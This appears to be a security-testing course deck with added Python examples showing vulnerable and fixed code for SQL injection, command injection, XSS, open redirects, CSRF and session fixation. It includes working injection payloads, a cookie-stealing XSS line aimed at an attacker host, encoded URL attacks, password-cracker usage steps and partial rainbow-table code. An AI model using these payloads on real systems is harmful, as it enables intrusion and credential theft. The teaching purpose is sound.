Software Attacks. Lora Borisova, QA Engineer, WCA Team; Anton Angelov, QA Engineer, Business System Team. Telerik QA Academy.


 Security Vulnerability Testing – Main Concepts
 Characteristics of Secure Software
 Threat Modeling
 Methods of Security Testing
 Popular Software Attacks
 Cryptography

Main Concepts

 What is security testing?
 A directed and focused form of testing that attempts to force specific failures to occur
 Closely related to reliability testing: the failures of interest are the ones an attacker could trigger on purpose

 Where do bugs come from?
 Bugs arise from interactions between the software and its environment during operation
 What is the software's operating environment?
 The human user
 The file system
 The operating system
 Other cohabitating and interoperating software

 Where do bugs come from?
 Bugs arise from the software's capabilities
 Accepting inputs
 Producing outputs
 Storing data
 Performing computations

 Is Software Security a Feature?
 Most people consider software security a necessary feature of a product
 Is a Security Vulnerability a Bug?
 If the software "failed" and allowed a hacker to see personal information, most users would consider that a software bug

 Vulnerabilities typically fall into two categories
 Bugs at the implementation level (e.g. an unchecked buffer, a SQL string built by concatenation)
 Tend to be easier for attackers to find and exploit, and easier to fix locally
 Flaws at the design level (e.g. trusting data that originates on the client, missing authorization checks)
 The hardest defect category to handle, because the fix changes the architecture
 Also the most prevalent and critical

 Intended vs. implemented software behavior in applications (diagram slide: the implemented behavior is larger than the intended behavior, and the unintended, undocumented part is where vulnerabilities live)

 In the real world, software failures usually happen spontaneously, without intentional mischief
 Failures can also be the result of malicious attacks, motivated by:
 Challenge or prestige
 Curiosity
 Using the victim's resources
 Vandalism
 Theft

 Software security testing includes:
 Creating security abuse/misuse cases
 Listing normative security requirements
 Performing architectural risk analysis
 Building risk-based security test plans
 Wielding static analysis tools
 Performing security tests
 Performing penetration testing in the final environment
 Cleaning up after security breaches

 Software Development Life Cycle, with security in mind (diagram slide: the security activities attached to each life-cycle artifact)
 Requirements and use cases: abuse cases, security requirements
 Design: risk analysis, external review
 Test plans: risk-based security tests
 Code: static analysis (tools)
 Test results: risk analysis, penetration testing
 Field feedback: security breaks

 Make your applications as simple as possible
 The more complicated the software, the greater the chance for mistakes
 And the greater the chance for a security break-in

 Confidentiality
 Disclosure of information only to the intended parties
 Integrity
 Assurance that the information is correct and has not been altered without authorization
 Data Security
 Privacy
 Data protection
 Controlled access

 Authentication
 Verifying that users are who they claim to be, so that access goes only to authorized people
 Availability
 Ready for use when expected
 Non-repudiation
 Information exchange with proof of who sent and who received it

 "Is this application secure?" Ever had anyone ask you this?
 There's an easy answer: NO
 There are no "secure" apps
 But there are apps that are secure enough
 How do you achieve enough security?

 Nobody has an infinite security budget
 Many folks would be happy if they had any budget
 Be practical!
 Get the most bang for your buck

 Threat modeling
 A process for evaluating a software system for security issues
 Can be considered a variation of formal reviews
 The review team looks for areas of the product's feature set that are susceptible to security vulnerabilities

 Threat modeling helps you find what is "secure enough"
 What are you trying to protect?
 Who is likely to attack you?
 What avenues of attack exist?
 Which vulnerabilities are the highest risk?
 Go after the high-risk vulnerabilities first!

 Don't have a security expert?
 Use Microsoft Patterns & Practices: "Threat Modeling Web Applications" (MSDN Library)
 Security guidance put together by well-known experts

 Threat modeling follows a few steps:
 Assemble the threat modeling team
 Identify the assets
 Create an architecture overview
 Decompose the application
 Identify the threats
 Document the threats
 Rank the threats

 Threats are not equally important
 A way to rank the threats is the DREAD formula: score each threat (e.g. 1 to 10) on each criterion and average the scores into a risk rating
 Damage potential
 Reproducibility
 Exploitability
 Affected users
 Discoverability

 Hackers attack where the weakest link is
 Find the weakest security link of your application and secure it as well as possible
 After you harden the weakest link, another one becomes the weakest: hardening is an iterative process, not a one-off

 OS Hardening
 Configure and apply patches
 Update the operating system
 Disable or restrict unwanted services and ports
 Lock down the ports
 Manage the log files
 Install root certificates
 Protect from Internet misuse and be cyber-safe
 Protect from malware

 Vulnerability Scanning
 Identify known vulnerabilities
 Scan intrusively for unknown vulnerabilities
 Port Scanning and Service Mapping
 Identify and locate open ports
 Identify running services

 Penetration Testing
 Simulating an attack from a malicious source
 Includes network scanning and vulnerability scanning
 Black-box: simulates an attack by someone unfamiliar with the system
 White-box: simulates an attack by someone with access to the source code, the network and passwords

 Firewall Rule Testing
 Identify inappropriate or conflicting rules
 Check the appropriate placement of vulnerable systems behind the firewall
 Discover administrative backdoors or tunnels
 SQL Injection
 Exploits a security vulnerability in the database layer
 Unexpected execution of user input as part of a query

 Cross-Site Scripting
 Injecting malicious client-side script into web pages
 Persistent (stored), non-persistent (reflected) and DOM-based vulnerabilities
 Parameter Manipulation
 Cookie manipulation
 Form field manipulation
 URL manipulation
 HTTP header manipulation

 Denial of Service Testing
 Flooding a target machine with enough traffic to make it incapable of serving legitimate requests
 Command Injection
 Inject and execute commands specified by the attacker
 Execute system-level commands through a vulnerable application

 Network Scanning
 Identifying active hosts on a network
 Collecting IP addresses that can be accessed over the Internet
 Collecting OS details, system architecture and running services
 Collecting network user and group names
 Collecting routing tables and SNMP data

 Password Cracking
 Collecting passwords from stored or transmitted data
 Using brute-force and dictionary attacks
 Identifying weak passwords
 Ethical Hacking
 Penetration testing, intrusion testing and red teaming

 File Integrity Testing
 Verifying file integrity against corruption or tampering using checksums
 Format String Testing
 Supplying format-type specifiers (e.g. %s, %x, %n) in the application input

 War Dialing
 Using a modem to dial a list of telephone numbers
 Searching for computers, bulletin board systems and fax machines
 Wireless LAN Testing
 Searching for existing WLANs and logging wireless access points

 Buffer Overflow Testing
 Supplying input larger than the buffer that receives it, so that adjacent memory of the process is overwritten (classically fixed-size char buffers)
 Random Data Testing
 Random data inputs to a program
 Encoded random data included as parameters
 Crashing built-in code assertions

 Random Mutation Testing
 Bit flipping of known legitimate data
 Byte-stream sliding within known legitimate data
 Session Hijacking
 Exploitation of a valid computer session
 Exploitation of the web session control mechanism
 Gaining unauthorized access to the web server

 Phishing
 Masquerading as a trustworthy entity in an electronic communication
 Acquiring usernames, passwords and credit card details
 URL Manipulation
 Making a web server deliver pages the user is not supposed to have access to
 URL rewriting

 IP Spoofing
 Creating Internet Protocol (IP) packets with a forged source IP address
 Packet Sniffing
 Capturing and analyzing all of the network traffic

 Virtual Private Network Testing
 Penetration testing of the VPN
 Social Engineering
 Psychological manipulation of people
 Into divulging confidential information

 SANS (System Administration, Networking, and Security) Institute
 Established in 1989 as a cooperative research and education organization
 Enables more than 165,000 security professionals, auditors, system administrators and network administrators to share the lessons they are learning and find solutions to the challenges they face
 See the SANS website for more information

 Selected entries from the CWE/SANS Top 25 Most Dangerous Software Errors:
 SQL injection
 OS command injection
 Cross-Site Scripting (XSS)
 Cross-Site Request Forgery (CSRF)
 Unrestricted upload of dangerous file types
 URL redirection to an untrusted site (open redirect)
 Buffer overflow
 Improper limitation of a pathname to a restricted directory (path traversal)

 Download of code without an integrity check
 Uncontrolled format string
 Missing or incorrect authorization
 Use of hard-coded credentials
 Missing encryption of sensitive data
 Execution with unnecessary privileges
 Improper restriction of excessive authentication attempts

 What is SQL injection?
 A code injection technique
 Malicious input is inserted into strings that are assembled into SQL statements
 The statement is later passed to the database server (e.g. SQL Server) for parsing and execution, where the input is interpreted as part of the query

 Original SQL query:
String sqlQuery = "SELECT * FROM user WHERE name = '" + username + "' AND pass='" + password + "'"
 Setting username to John and password to ' OR '1'='1 produces:
SELECT * FROM user WHERE name = 'John' AND pass='' OR '1'='1'
 The result:
 AND binds tighter than OR, so the condition reads (name = 'John' AND pass = '') OR ('1' = '1'), which is true for every row
 The query returns all users; a login routine that takes the first returned row lets the attacker in without a password, whether or not a user John exists


 Use prepared statements (parameterized queries): the only reliable fix
 Validate all of the user information
 Removing special characters from the user input is not a substitute: hand-written escaping is easy to get wrong for a particular database
 Never show SQL error messages to the user
 Use different field names in the user interface and in the database
 Disable all unused features of the database
 Limit the permissions of the database account the application connects with
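The login query from the slide, rebuilt as a runnable example. This is added code, not code from the original slides, and it uses an in-memory SQLite database with two constructed users. `login_vulnerable` concatenates strings exactly as the slide's `sqlQuery` does; `login_safe` is the prepared-statement version from the first mitigation bullet.

```python
import sqlite3


def make_db():
    """In-memory SQLite database with constructed sample users (not real data)."""
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE user (name TEXT, pass TEXT)")
    conn.executemany(
        "INSERT INTO user VALUES (?, ?)",
        [("admin", "s3cret-admin"), ("John", "hunter2")],
    )
    conn.commit()
    return conn


def login_vulnerable(conn, username, password):
    """Builds the query by string concatenation, like the slide's sqlQuery.

    The user input becomes part of the SQL grammar, so quotes, OR and
    comment markers in the input change what the query means.
    """
    sql = (
        "SELECT name FROM user WHERE name = '" + username
        + "' AND pass = '" + password + "'"
    )
    rows = conn.execute(sql).fetchall()
    # A typical login takes the first matching row as "the" logged-in user.
    return rows[0][0] if rows else None


def login_safe(conn, username, password):
    """Prepared statement: placeholders are bound as data, never parsed as SQL."""
    rows = conn.execute(
        "SELECT name FROM user WHERE name = ? AND pass = ?",
        (username, password),
    ).fetchall()
    return rows[0][0] if rows else None


if __name__ == "__main__":
    db = make_db()
    # Slide's payload: AND binds tighter than OR, so the WHERE clause becomes
    # (name='John' AND pass='') OR ('1'='1'), which is true for every row.
    print(login_vulnerable(db, "John", "' OR '1'='1"))    # a user, no password needed
    print(login_vulnerable(db, "nobody", "' OR '1'='1"))  # the user need not even exist
    print(login_vulnerable(db, "admin' --", "anything"))  # '--' comments out the pass check
    print(login_safe(db, "John", "' OR '1'='1"))          # None: payload is just a string
    print(login_safe(db, "John", "hunter2"))              # John
```

Note that the vulnerable version logs the attacker in as whichever row the database returns first (here the admin account), which is why "limit the permissions of the database account" is only damage control: the query itself must stop trusting its input.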

 An OS command injection attack occurs when an attacker executes system-level commands through a vulnerable application

 An application that executes unwanted system commands is like a pseudo system shell; the attacker can use it as any authorized system user
 However, the commands are executed with the same privileges and environment as the application has, which is one more reason to run the application with as few privileges as possible
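A runnable illustration of the point above, added here and not taken from the slides: the same lookup implemented once by handing a string to the system shell and once with an argument list plus an allowlist. `echo` stands in for the real tool (such as ping or nslookup) so the example runs offline; the hostname pattern is an assumption for this example.

```python
import re
import subprocess

# Allowlist for the one parameter we expect (assumption: a DNS hostname).
HOSTNAME_RE = re.compile(r"[A-Za-z0-9](?:[A-Za-z0-9.-]{0,252})")


def is_allowed_host(host):
    """True only for strings that look like a hostname: no ';', '|', '$(', spaces."""
    return HOSTNAME_RE.fullmatch(host) is not None


def run_vulnerable(host):
    """Passes a string to the system shell (shell=True): metacharacters in
    `host` are interpreted by the shell, so the caller chooses the commands.
    This is the vulnerable pattern the slide describes."""
    proc = subprocess.run("echo resolving " + host, shell=True,
                          capture_output=True, text=True)
    return proc.stdout


def run_argv_only(host):
    """argv form without validation: no shell parses the input, so the whole
    payload is passed as one literal argument and merely printed."""
    proc = subprocess.run(["echo", "resolving", host],
                          capture_output=True, text=True)
    return proc.stdout


def run_safe(host):
    """Two independent defences: allowlist validation and the argv form."""
    if not is_allowed_host(host):
        raise ValueError("refusing hostname: %r" % host)
    return run_argv_only(host)


if __name__ == "__main__":
    payload = "example.com; echo INJECTED"   # constructed attacker input
    print(run_vulnerable(payload))   # two lines: the echo, then the injected command
    print(run_argv_only(payload))    # one line, payload printed as text
    print(is_allowed_host(payload))  # False: run_safe would reject it
```

The argv form alone already removes the shell from the picture; the allowlist is still worth having because the invoked program may interpret arguments of its own (for example an argument beginning with `-`).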

DEMO

 Do you really need a method or a class to be public?
 If not, make it private or protected

 What is XSS?
 A type of computer security vulnerability in web applications
 Allows injecting client-side script into web pages viewed by other users

 What is XSS?
 The malicious code, along with the original web page, is rendered in the web client
 Because it runs in the origin of the vulnerable site, the injected script gets the same access to that page as the site's own code

 Stealing other users' cookies
 Stealing their private information
 Performing actions on behalf of other users
 Redirecting to other websites
 Showing ads in hidden IFRAMEs and pop-ups

 Validate all input data from the user
 Never show data entered by the user without cleaning it of JavaScript and HTML
 If user-entered HTML or JavaScript must be displayed, encode it for the output context so that the browser renders it as text
 The browser will then ignore the entered code

 Consider each user input as incorrect until proven correct
 Never accept user input without complete validation
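A small rendering example, added here and not from the slides, showing what "cleaning" user data of HTML and JavaScript looks like in practice: the same comment rendered raw and HTML-encoded, the attribute context where quotes also need encoding, and a decoder for the percent-encoded form in which such payloads arrive inside URL parameters. The payload strings and the attacker hostname are constructed for the example.

```python
import html
from urllib.parse import unquote


def render_vulnerable(comment):
    """Drops user text straight into the page: any <script> in it runs."""
    return '<div class="comment">' + comment + '</div>'


def render_safe(comment):
    """HTML-encodes the text so the browser shows it instead of executing it."""
    return '<div class="comment">' + html.escape(comment, quote=True) + '</div>'


def render_attribute_safe(value):
    """Attribute context: quote=True also encodes " and ', so the value cannot
    close the attribute and add an event handler of its own."""
    return '<input name="q" value="' + html.escape(value, quote=True) + '">'


def decode_url_payload(encoded):
    """Percent-decode a URL parameter the way the server framework would,
    so the attack string hidden in a link becomes visible."""
    return unquote(encoded)


if __name__ == "__main__":
    # Constructed stored-XSS payload: exfiltrates the cookie to an attacker host.
    payload = "<script>new Image().src='http://attacker.example/?c='+document.cookie</script>"
    print(render_vulnerable(payload))
    print(render_safe(payload))
    print(render_attribute_safe('" onfocus="alert(1)'))
    print(decode_url_payload("%3a%2f%2fwww.badplace.com%2fnasty.js%22%3e%3c%2fscript%3e"))
```

Encoding is context-specific: `html.escape` is right for element content and quoted attributes, but data placed inside a `<script>` block, a URL, or a CSS rule needs the encoding rules of that context instead.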

 Acunetix WVS checks your web applications for XSS, SQL injection and other vulnerabilities
 A free demo version with limited functionality is available (XSS checks only)

 What is a buffer overflow?
 An anomaly where a program, while writing data to a buffer, overruns the buffer's boundary and overwrites adjacent memory
 Also called buffer overrun

 Buffer overflow is commonly associated with C and C++
 These languages provide no built-in protection against reading or writing outside an array's bounds

 Choice of programming language
 Use of safe libraries
 Buffer overflow protection (stack canaries)
 Pointer protection
 Executable space protection (NX / DEP)
 Address space layout randomization (ASLR)
 Deep packet inspection

 What is Wireshark?
 Free and open-source packet analyzer
 Used for:
 Network troubleshooting
 Analysis
 Software and communications protocol development

Demo

 What is a password attack?
 A type of software attack in which the attacker tries to guess passwords or crack stored password hashes or encrypted password files
 Either manually or through the use of scripts

 Simple guessing
 Dictionary attacks
 Using a list of popular passwords
 Password phishing
 Masquerading as a trustworthy entity
 Brute-force attacks
 Generating all possible combinations


 9.8% have the password "password" or one of two other top passwords
 14% have a password from the top 10 passwords
 40% have a password from the top 100 passwords
 79% have a password from the top 500 passwords
 91% have a password from the top passwords (larger list)
 98.8% have a password from the top passwords (largest list)

 What is THC-Hydra?
 A very fast network logon cracker which supports many different services
 Free of charge for non-enterprise use

Currently this tool supports:
 POP3
 FTP
 HTTP-GET, HTTP-FORM-POST, HTTPS-GET, ...
 Firebird
 Subversion (SVN)
 Telnet
 And many more

 What types of attacks can THC-Hydra do?
 Parallel dictionary attacks (16 threads by default)
 Brute-force / hybrid attacks
 Check for null passwords, the login reversed, and a password equal to the username
 Throttle the attack to slow it down and avoid triggering an IPS (Intrusion Prevention System)
 Parallel attacks on different servers

 Download and install Cygwin, a Linux-like environment for Windows
 In the Cygwin shell, go to the hydra directory: cd C:\hydra-7.3
 Type ./configure, then make and finally make install
 For help type: hydra
 For help on a module: hydra -U "module-name"
 Example: hydra -U http-form-post

DEMO

 Choosing good passwords:
 1. Start with a base word phrase, e.g. cstfttt
 2. Lengthen the phrase, e.g. cstftttGmail
 3. Scramble the phrase, e.g. hbd(Gmail
 4. Lastly: rotate/change your password regularly (note that current guidance such as NIST SP 800-63B recommends changing a password when compromise is suspected rather than on a fixed schedule)
 Or use a strong password generator, e.g. FlyingBit

 What is a Denial of Service attack?
 An attempt to make a computer resource unavailable to its intended users
 Sending messages which exhaust the service provider's resources
 Network bandwidth, system resources, application resources

 DDoS attacks
 Employing multiple (dozens to millions of) compromised computers to perform a coordinated and widely distributed DoS attack

 Limit the ability of systems to send spoofed packets
 Rate controls in upstream distribution networks
 Use modified TCP connection handling (e.g. SYN cookies)
 Block IP broadcasts
 Block suspicious services and combinations

 Manage application attacks with "puzzles" (e.g. CAPTCHAs) to distinguish legitimate human requests
 Good general system security practices
 Use mirrored and replicated servers when high performance and reliability are required

 An open redirect is an application that takes a parameter and redirects the user to the parameter's value without any validation
 Real redirect: a link on the trusted site that forwards the user to a destination given in the URL
 Faked link: /../../../redirect.asp%3F%3Dhttp%3A// assword_recovery_system
 The faked link appears to belong to the trusted site: the path-traversal segments and the double URL-encoding hide the real destination from the victim
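A validator for a redirect parameter, added here as an example and not part of the slides. The site host is an assumption for this example. The function accepts only a site-relative path and rejects every form an attacker uses to point the redirect elsewhere: an absolute URL, a protocol-relative `//host`, a `javascript:` scheme, backslashes (which some browsers treat as slashes) and CR/LF (header injection).

```python
from urllib.parse import urlsplit, urljoin

# Assumption for this example: the application lives on this host.
SITE_HOST = "www.example.com"


def safe_redirect_target(param):
    """Return an absolute URL on our own host, or None to refuse the redirect.

    Only a path that starts with a single "/" is accepted; urljoin then
    resolves "/../" segments against our base, so the result can never
    leave SITE_HOST. The final netloc check is a belt-and-braces guard.
    """
    if not param or any(c in param for c in "\\\r\n"):
        return None
    parts = urlsplit(param)
    if parts.scheme or parts.netloc:
        return None                      # "http://evil", "//evil", "javascript:"
    if not param.startswith("/") or param.startswith("//"):
        return None                      # relative fragments and "//host" forms
    target = urljoin("https://" + SITE_HOST + "/", param)
    if urlsplit(target).netloc != SITE_HOST:
        return None
    return target


if __name__ == "__main__":
    for candidate in [
        "/account/settings",                          # legitimate
        "//evil.example/phish",                       # protocol-relative
        "http://evil.example/phish",                  # absolute
        "javascript:alert(1)",                        # scheme smuggling
        "\\\\evil.example",                           # backslash form
        "/../../../redirect.asp?=http://evil.example" # traversal, as on the slide
    ]:
        print(repr(candidate), "->", safe_redirect_target(candidate))
```

The traversal example resolves to a path on our own host, which is the point: the worst an attacker can now do is send the user to another page of the same site. If the application genuinely needs to redirect off-site, replace the host check with an explicit allowlist of destination hosts rather than trying to blacklist bad ones.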

 Imagine a user receives an invitation to view his profile at a URL that ends in his numeric profile ID
 Accidentally he omits the final "9" and opens a URL with a different ID
 As a result, he opens someone else's profile
 Gaining access to someone else's personal information, because the server never checked that the requested profile belongs to the logged-in user

 Why would someone manipulate a URL?
 Getting a web server to deliver web pages he is not supposed to have access to
 Triggering an exception, thus revealing information in an error message

 Example:
 Removing any site from Google, even when you don't control it!
 Exploit in Google Webmaster Tools, fixed within 7 hours
 It was enough to open the following URL: request?hl=en&siteUrl={YOUR_URL}/&urlt={URL_TO_BLOCK}
 The service did not verify that the URL to block belonged to a site the requesting user actually controlled

See: from-google-even-if-you-dont-control-it.html

 URL Attack as an XSS
 %3a%2f%2fwww.badplace.com%2fnasty.js%22%3e%3c%2fscript%3e
 Decoded, this tail reads ://www.badplace.com/nasty.js"></script>: the parameter closes the attribute it was placed in and injects a script tag that loads the attacker's file
 URL Attack as an SQL Injection
 ogintable%20set%20passwd%3d%270n3d%27%3b--%00
 Decoded: ogintable set passwd='0n3d';-- followed by a NUL byte; an UPDATE of the login table that sets every password, with a comment marker and %00 to cut off whatever the application appends

 A.k.a. one-click attack or session riding, abbreviated CSRF (pronounced "sea-surf") or XSRF
 A type of malicious exploit of a website whereby unauthorized commands are transmitted from a user that the website trusts
 A vulnerable URL (a transfer endpoint that takes the amount and the recipient as parameters): &amount= &for=mallory
 Secret cookies and accepting only POST requests do not help on their own: the browser attaches the cookies automatically, and a hidden form on the attacker's page can submit a POST
 What does help is an unguessable per-session anti-CSRF token embedded in every state-changing form and checked on the server
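The server side of the transfer endpoint with an anti-CSRF token, added here as an example (not from the slides). The server secret and the session IDs are constructed for the example. The token is an HMAC of the session ID: the attacker's page cannot compute it without the server secret and cannot read it out of the victim's page across origins, so a forged request arrives with the victim's cookie but without a valid token.

```python
import hashlib
import hmac
import secrets

# Assumption: a per-server secret generated at startup and never sent to clients.
SERVER_SECRET = secrets.token_bytes(32)


def csrf_token(session_id):
    """Token bound to one session; the server embeds it in the forms it serves."""
    return hmac.new(SERVER_SECRET, session_id.encode(), hashlib.sha256).hexdigest()


def handle_transfer(session_id, form):
    """Handler for the slide's transfer URL. `session_id` comes from the cookie
    the browser attaches automatically; `form` is the submitted body.
    Returns (status, message)."""
    supplied = form.get("csrf_token", "")
    expected = csrf_token(session_id)
    # Constant-time comparison so the check does not leak the token byte by byte.
    if not hmac.compare_digest(supplied.encode(), expected.encode()):
        return 403, "CSRF token missing or invalid"
    return 200, "transferred %s to %s" % (form["amount"], form["for"])


if __name__ == "__main__":
    victim = "sess-victim-123"            # constructed session ID
    # Forged request from the attacker's page: the cookie rides along, the token does not.
    print(handle_transfer(victim, {"amount": "1000", "for": "mallory"}))
    # Token for the attacker's own session is useless against the victim's.
    print(handle_transfer(victim, {"amount": "1000", "for": "mallory",
                                   "csrf_token": csrf_token("sess-attacker")}))
    # Legitimate form: the server put the token into the page it served to the victim.
    print(handle_transfer(victim, {"amount": "50", "for": "bob",
                                   "csrf_token": csrf_token(victim)}))
```

The token must be tied to the session (here via the HMAC input) so that a token harvested from the attacker's own account cannot be replayed against another user, and it must only ever travel in the request body or a custom header, never in a cookie, or the browser would attach it automatically and defeat the purpose.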

 Follow the Principle of Least Privilege
 Give no user (and no application account) greater permissions than needed to perform its job

 Error messages can reveal important information about your site (stack traces, file paths, database structure)
 Error messages like the one shown on the slide should never reach the user

DEMO

 All applications throw errors every once in a while
 Make sure that even in this case your application remains stable and fails closed, showing the user a generic message while logging the details server-side

 What is IP address spoofing?
 Creation of Internet Protocol (IP) packets with a forged source IP address
 What is the purpose?
 Concealing the identity of the sender
 Impersonating another computing system

 Packet filtering
 Ingress filtering
 Blocking packets arriving from outside the network whose source address claims to be inside the network
 Egress filtering
 Blocking packets leaving the network whose source address is not inside the network
 Not relying on the IP address for authentication

 What is session hijacking?
 Getting access to the session state of a particular user
 The attacker steals a valid session ID, uses it to get into the system and retrieves the data as that user

 Spoofing
 The attacker does not actively take another user offline to perform the attack
 He mainly pretends to be another user or machine to gain access
 (Figure: attacker to server: "I am John and here are my credentials")

 Hijacking
 The attacker takes over an existing session
 He relies on the legitimate user to make a connection and authenticate
 (Figure: John logs on to the server with his credentials)

 Hijacking
 Subsequently, the attacker takes over the session (figure)

 Session fixation
 Setting a user's session ID to a predefined one before he logs in, so the attacker already knows the ID of the authenticated session
 Session sidejacking
 Using packet sniffing to read network traffic between two parties and steal the session cookie
 Cross-site scripting
 Injected script obtains a copy of the cookie

 There are two main types of session hijacking:
 Active
 The attacker finds an active session and takes it over
 Passive
 The attacker hijacks a session, then sits back and watches, recording all the traffic that is being sent back and forth without interfering

DEMO

 Use encryption
 Use a secure protocol (e.g. HTTPS for the whole session, so the session cookie never travels in the clear)
 Limit incoming connections
 Minimize remote access
 Educate the employees

 Check authentication data constantly
 A user or an application might have once passed a security check
 That does not mean they should be trusted blindly from that moment on
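A minimal server-side session store, added as an example (not from the slides), showing the two controls that the session fixation entry and the "check authentication data constantly" slide call for: login always issues a fresh, unguessable session ID and discards the pre-login one, and every request re-validates the session and its idle timeout. The timeout value is an assumption for the example.

```python
import secrets
import time


class SessionStore:
    """Server-side session table: sid -> {"user": name or None, "last_seen": epoch}."""

    def __init__(self, idle_timeout=1800):
        self._sessions = {}
        self.idle_timeout = idle_timeout   # assumption: 30 minutes idle limit

    def create(self):
        """Anonymous session with a 256-bit random ID (unguessable, unlike a counter)."""
        sid = secrets.token_urlsafe(32)
        self._sessions[sid] = {"user": None, "last_seen": time.time()}
        return sid

    def login(self, sid, user):
        """Authenticate: drop the pre-login session and return a brand-new ID.
        An ID the attacker planted before login (session fixation) therefore
        never becomes an authenticated session."""
        self._sessions.pop(sid, None)
        new_sid = self.create()
        self._sessions[new_sid]["user"] = user
        return new_sid

    def user_for(self, sid, now=None):
        """Re-check the session on every request; expire it when idle too long."""
        now = time.time() if now is None else now
        entry = self._sessions.get(sid)
        if entry is None:
            return None
        if now - entry["last_seen"] > self.idle_timeout:
            del self._sessions[sid]
            return None
        entry["last_seen"] = now
        return entry["user"]

    def logout(self, sid):
        self._sessions.pop(sid, None)


def fixation_attempt(store):
    """Attacker obtains a valid anonymous SID and tricks the victim into using it.
    Returns what the attacker sees through that SID after the victim logs in."""
    planted = store.create()              # attacker's pre-issued ID
    store.login(planted, "victim")        # victim's browser sends the planted ID at login
    return store.user_for(planted)        # None: the old ID was invalidated


if __name__ == "__main__":
    store = SessionStore()
    print(fixation_attempt(store))        # None
    sid = store.create()
    new_sid = store.login(sid, "john")
    print(store.user_for(new_sid), store.user_for(sid))   # john None
```

The same regeneration should happen on any privilege change (password change, role elevation), and the cookie carrying the ID should be marked Secure and HttpOnly so that the sidejacking and XSS routes listed above are closed as well.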

 What is social engineering?
 The act of manipulating people into performing actions or revealing confidential information
 Instead of breaking in or using technical hacking techniques
 Essentially a fancier, more technical way of lying

 "Dumpster Diving"
 "Shoulder Surfing"
 Malicious attachments
 Deception and manipulation
 "Phishing"
 "Pharming"
 Reverse social engineering
 PBX disguise

 Phishing is a way of attempting to acquire sensitive information such as usernames, passwords and credit card details by masquerading as a trustworthy entity in an electronic communication

 Pharming is an attack aiming to redirect a website's traffic to another, bogus website, typically by poisoning DNS answers or the victim's local hosts file

 "Dumpster Diving", a.k.a. trashing or skipping, is the practice of sifting through commercial or residential trash to find items that have been discarded by their owners but which may be useful to the dumpster diver


 Real story: after the Japan earthquake, scammers spread malicious links to "dramatic" videos of the disaster. Clicking on such a link downloaded malware onto your PC or took you to a phishing site that asked for personal information

 Shoulder surfing covers direct observation techniques, such as looking over someone's shoulder, to get information. It is particularly effective in crowded places because it is relatively easy to observe someone as they:
 fill out a form
 enter their PIN
 enter their password
 tell sensitive information over the phone

 PBX disguise (PBX: Private Branch Exchange, the company's internal phone system): the attacker manipulates the company's caller-ID system to impersonate someone of authority
 "Hello? Who is this? Tech support? Oh, I'm sorry. I'm trying to reach Terry Simpson at extension. Can you transfer me, please? I'm in a hurry." … "Hi Terry, this is Jim from Tech Support. You can verify my identity from the caller-ID. Yes, I need to reset your password…"
 Because the call was transferred internally, the caller-ID shown to Terry is an internal extension, which is exactly the "proof" the attacker then points to

 A final, more advanced method of gaining illicit information is known as "reverse social engineering": the hacker creates a persona that appears to be in a position of authority, so that employees ask him for information rather than the other way around
 Includes three phases: sabotage, advertising, assisting

 Real-world example: Magstudio had created an online game for one of their customers, Petrol AD

 At the end of the game, the player's collected points were submitted directly from the client as a POST request, without any encryption or integrity check
 The request looked like this:
POST /path/script.cgi HTTP/1.0
From:
User-Agent: HTTPTool/1.0
Content-Type: application/x-www-form-urlencoded
Content-Length: 33

name=Peter&surname=Sabev&score=10
 Changed (with an intercepting proxy) to:
Content-Length: 36
name=Peter&surname=Sabev&score=
 The lesson: a value that originates on the client cannot be trusted, encrypted or not; the score has to be computed, or at least verified, on the server

 What is cryptography?
 The practice and study of techniques for protecting information from adversaries (historically: hiding information)
 It is considered a branch of both mathematics and computer science

 Cryptography has three main elements
 Encryption: the process of transforming information (referred to as plaintext) using an algorithm (called a cipher) to make it unreadable to anyone except those possessing special knowledge, usually referred to as a key
 Decryption: the reverse transformation, recovering the plaintext from the ciphertext with the key
 Key: a value that works with a cryptographic algorithm to produce a specific ciphertext

 Based on the type of key used, cryptography is categorized into:
 Symmetric-key cryptography (the same secret key encrypts and decrypts)
 Asymmetric-key cryptography, a.k.a. public-key cryptography (a public key encrypts or verifies, the matching private key decrypts or signs)
 The biggest 128-bit number: 340,282,366,920,938,463,463,374,607,431,768,211,455, which equals 2^128 − 1


 Rainbow tables
 Precomputed tables for reversing cryptographic hash functions
 Used for cracking password hashes
 Recover the plaintext password, up to a certain length and consisting of a limited set of characters
 Cryptohaze GPU Rainbow Cracker

 Full rainbow tables: each chain alternates hashing and a reduction function that maps a hash back into the password space, e.g. MD5(plaintext) -> fcea920f749 -> Reduction(fcea920f749) -> new plaintext -> MD5(new plaintext) -> d7db1cf7 -> Reduction(d7db1cf7) -> ...; only the first and last element of each chain are stored
 Here is the algorithm:
 1. Check to see if the hash matches any of the final hashes. If so, break out of the loop because you have found the chain that contains its plaintext.
 2. If the hash doesn't match any of the final hashes in the tables, use the reduction function on it to reduce it into another plaintext, and then hash the new plaintext. Go back to step 1.


 Salt consists of random bits, creating one of the inputs to a hash function
 The salt is different for every user and is stored next to the hash; a table precomputed for bare passwords then no longer matches any stored hash
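A working miniature of the chain lookup from the rainbow table slides together with the salting fix, added here as an example and not taken from the slides. The parameters are assumptions: the password space is 4-digit numeric PINs, MD5 is the hash (as in the slide's chain), chains are 50 steps long and 300 of them are built. This is the single-reduction-function (Hellman) chain variant; real rainbow tables use a different reduction per chain position to reduce chain merges, but the lookup loop has the same shape as the slide's two steps.

```python
import hashlib
import random
from typing import Dict, List, Optional

SPACE = 10_000     # assumption: passwords are the PINs "0000" .. "9999"
CHAIN_LEN = 50     # assumption: hash/reduce steps per chain


def md5_hex(s: str) -> str:
    return hashlib.md5(s.encode()).hexdigest()


def reduce_hash(h: str) -> str:
    """Reduction: fold a hex digest back into the PIN space (not an inverse of MD5)."""
    return "%04d" % (int(h[:8], 16) % SPACE)


def build_table(n_chains: int, seed: int = 7) -> Dict[str, List[str]]:
    """Precompute chains; store only {end_point: [start_points]}.
    p_{i+1} = R(H(p_i)); several chains may merge into one end point."""
    rng = random.Random(seed)          # fixed seed so the table is reproducible
    table: Dict[str, List[str]] = {}
    for _ in range(n_chains):
        start = "%04d" % rng.randrange(SPACE)
        p = start
        for _ in range(CHAIN_LEN):
            p = reduce_hash(md5_hex(p))
        table.setdefault(p, []).append(start)
    return table


def crack(target: str, table: Dict[str, List[str]]) -> Optional[str]:
    """The slide's algorithm: walk forward from the target hash; whenever we
    land on a stored end point, replay that chain from its start looking for
    a plaintext whose hash is the target. A merged chain can give a false
    alarm, in which case we keep walking."""
    y = reduce_hash(target)
    for _ in range(CHAIN_LEN):
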